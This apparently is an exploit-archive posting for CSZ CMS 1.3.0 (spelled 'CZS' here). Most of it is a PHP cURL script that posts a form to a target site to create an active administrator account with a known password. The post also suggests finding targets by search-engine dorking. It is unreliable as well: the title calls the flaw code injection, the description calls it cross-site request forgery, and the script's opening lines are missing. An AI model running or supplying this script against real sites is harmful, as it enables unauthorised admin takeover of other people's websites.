============================================================================================================================================= | # Title : CZS CMS v 1.3.0 php code injection vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://www.cszcms.com | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: CZS CMS version 1.3.0 suffers from a cross site request forgery vulnerability. (Related : https://packetstorm.news/files/id/189609/ Related CVE numbers: ) . [+] Usage : php poc.php [+] Set Target : LIne 5 [+] PayLoad : 'admin', 'email' => 'admin@admin.com', 'password' => 'pass', 'con_password' => 'pass', 'group' => '1', 'pass_change' => 'yes', 'active' => 1 ]; // Initialize cURL session $ch = curl_init(); // Set cURL options curl_setopt($ch, CURLOPT_URL, $target_url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($fields)); // Post the fields as URL-encoded curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Return response as string // Execute cURL request and capture the response $response = curl_exec($ch); // Check for errors if ($response === false) { echo "Error: " . curl_error($ch); } else { echo "Request sent successfully!"; } // Close cURL session curl_close($ch); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================